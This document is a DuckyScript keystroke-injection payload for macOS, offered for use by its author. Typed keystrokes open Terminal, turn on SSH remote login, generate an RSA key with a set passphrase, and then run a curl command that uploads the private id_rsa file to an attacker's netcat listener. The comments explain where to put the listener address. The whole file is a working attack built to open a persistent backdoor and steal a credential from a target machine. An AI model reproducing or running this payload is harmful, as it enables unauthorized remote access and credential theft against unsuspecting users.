REM 	- made by Someoneishere - 
REM  This is a payload which makes
REM  the targets macos, startup
REM  ssh and then it will make a id_rsa
REM  which will be sent to netcat listener using curl
REM  (usage: macOS)

REM  Here I am defining the commands that I am going to be
REM  using the most.
REM  use nc -l PORT to listen
REM  You will need to change line 25 and 81

REM  you will need to put the ip for the listener and also the passphrase that you
REM  want ssh to encrypt the id_rsa with.

REM  [Optional] - this is the id_rsa passphrase that will be prompted when joining ssh
REM  leaving it empty means that there wouldn't be any passphrase needed

REM [!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!]
REM  change "someonewashere" into the passphrase the id_rsa should use
REM  In line 84 you add the netcat listener ip ex. 192.168.0.0:1337 
REM [!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!]

REM   if the delays are too long, then simple change them where it says - DEFINE COUPLE / WHILE / WAIT

REM  ! Starting the script !

DELAY 2500
COMMAND SPACE
DELAY 1000
STRING Terminal
DELAY 500
ENTER
DELAY 500
STRING systemsetup -setremotelogin on
DELAY 500
ENTER
DELAY 500
STRING chmod 700 /Users/$USER/.ssh
DELAY 500
ENTER 
DELAY 300
STRING cd /Users/$USER/.ssh


DELAY 500
ENTER
ENTER
ENTER
DELAY 1000
STRING ssh-keygen -t rsa 
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 1000
STRING someonewashere
DELAY 500
ENTER
DELAY 500
STRING someonewashere
DELAY 500
ENTER

REM  - here we have finished with the processof generating the
REM    id_rsa and id_rsa.pub

DELAY 1000
STRING ssh-add /Users/$USER/.ssh/id_rsa
DELAY 500
ENTER
DELAY 1000
STRING someonewashere
DELAY 500
ENTER
DELAY 500

REM  - here we have added our id_rsa to the local ssh keychain (initialization)

ENTER
DELAY 1000

REM [!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!]
STRING curl -F attachment=@/Users/$USER/.ssh/id_rsa http://IP_AND_PORT
REM [!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!]

DELAY 500
ENTER

REM  - here we are sending the data using curl to our netcat listener

REM  - to exit 

DELAY 4000
CTRL c
ENTER
DELAY 1000
STRING exit
DELAY 500
ENTER
DELAY 1000
GUI q
ENTER
